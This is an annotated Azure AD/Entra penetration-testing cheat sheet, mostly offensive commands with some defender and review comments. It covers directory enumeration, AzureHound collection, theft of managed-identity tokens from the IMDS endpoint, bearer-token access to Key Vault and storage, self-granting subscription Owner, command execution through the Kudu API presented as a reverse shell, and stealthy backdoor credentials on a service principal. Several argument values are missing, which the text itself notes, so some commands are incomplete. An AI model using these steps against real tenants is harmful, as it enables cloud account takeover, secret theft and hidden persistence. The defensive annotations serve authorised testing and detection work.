Azure AD pentesting — tenant recon, service principal abuse, managed identity attacks.
# Identity and permissions
# NOTE(review): this is a command cheat-sheet, not a runnable script. Several
# argument values appear to have been lost during page extraction
# (`--assignee` with no value, `/subscriptions//`, `https://.vault.azure.net`,
# `https://.scm.azurewebsites.net`, `--id` with no value) — fill in from your
# own engagement scope; as written those lines are syntactically incomplete.
# Context: which subscription/tenant the CLI session is bound to and which
# principal is signed in. Everything below is scoped by this identity.
az account show; az account list
az ad signed-in-user show
# --assignee is missing its value here (extraction loss); L31 shows the
# working form that resolves the signed-in user's object id.
az role assignment list --assignee --all
# Users, groups, apps
# Directory-read enumeration. On the defender side these are Microsoft Graph
# reads and are not individually audited; the sign-in that obtained the
# token is the visible event.
az ad user list --output table
az ad group list --output table
az ad app list --output table
az ad sp list --output table
# Resources
# ARM-level inventory; each call is a read against the Resource Manager API
# and is scoped to the subscriptions the identity can see.
az resource list --output table
az keyvault list --output table
az storage account list --output table
az webapp list --output table
az functionapp list --output table
# AzureHound collection
# `[email protected]` is an obfuscated placeholder left by the page
# extractor, not a literal value. Passing `-p pass` on argv exposes the
# password to `ps` and shell history — prefer an environment variable or
# prompt where the tool supports it.
azurehound list -t -u [email protected] -p pass -o output.json
# Import to BloodHound for attack path analysis
# From inside Azure VM/Function/App with MI enabled
# IMDSv1 endpoint (Azure)
# The `Metadata: true` header is mandatory for Azure IMDS; the address is
# link-local and only answers from inside the compute instance. The token
# is minted for the `resource` audience given in the query string.
# Defender note: the token request itself is not visible in the guest OS
# logs; the managed identity's sign-in and the subsequent ARM calls are
# where the activity surfaces.
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H 'Metadata: true'
# Use access_token for Azure API calls
# `eyJ` is the base64 prefix of a JWT header — this is a bearer credential
# and must be treated as a secret (keep it out of `set -x`, shell history and
# shared terminals).
TOKEN="eyJ..."
# Subscription id between the slashes is missing (extraction loss).
curl -H "Authorization: Bearer $TOKEN" https://management.azure.com/subscriptions//resources?api-version=2021-04-01
# Key Vault access with MI token
# NOTE: the IMDS token above was requested for the management.azure.com
# audience; a Key Vault data-plane call needs a token for the vault
# resource, so this only works with a token minted for that audience.
# Vault name before `.vault.azure.net` is missing (extraction loss).
curl -H "Authorization: Bearer $TOKEN" https://.vault.azure.net/secrets?api-version=7.3
# Storage account access
# Same audience caveat as Key Vault: the blob endpoint expects a token for
# the storage resource. Account name before `.blob.core.windows.net` missing.
curl -H "Authorization: Bearer $TOKEN" 'https://.blob.core.windows.net/?comp=list'
# Check what permissions you have
# The `$(...)` substitution is unquoted; a single object-id GUID contains no
# whitespace so it is harmless here, but `"$(...)"` is the safer habit.
az role assignment list --assignee $(az ad signed-in-user show --query id -o tsv) --all
# If you have Owner/UserAccessAdministrator:
# Add yourself as subscription Owner
# Defender note: this writes a role assignment and is recorded in the Azure
# Activity Log as Microsoft.Authorization/roleAssignments/write — a
# high-signal event worth alerting on, especially for the Owner role.
# Mitigation: keep standing Owner/User Access Administrator grants minimal
# and prefer just-in-time elevation.
# `--assignee` value and subscription id are missing (extraction loss).
az role assignment create --assignee --role Owner --scope /subscriptions/
# If you have Contributor on App Service:
# Deploy reverse shell via Kudu API
# The three lines below are one command joined by `\` continuations — do not
# insert comments between them. Kudu's command endpoint runs under the app's
# identity; Contributor on the App Service implies Kudu access. Defender
# note: consider restricting SCM site access (networking / Basic Auth
# publishing credentials) so Contributor alone does not grant shell access.
curl -X POST "https://.scm.azurewebsites.net/api/command" \
-H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
-d '{"command":"id","dir":"/"}'
# Add credentials to Service Principal (if you have Application.ReadWrite.All)
# `--append` keeps existing credentials so the addition is less disruptive
# (and therefore less noticeable). Defender note: this is logged in the
# Entra ID audit log as an application update under "Certificates and
# secrets management"; new credentials on high-privilege apps should be
# reviewed promptly. `--id` value is missing (extraction loss).
az ad app credential reset --id --append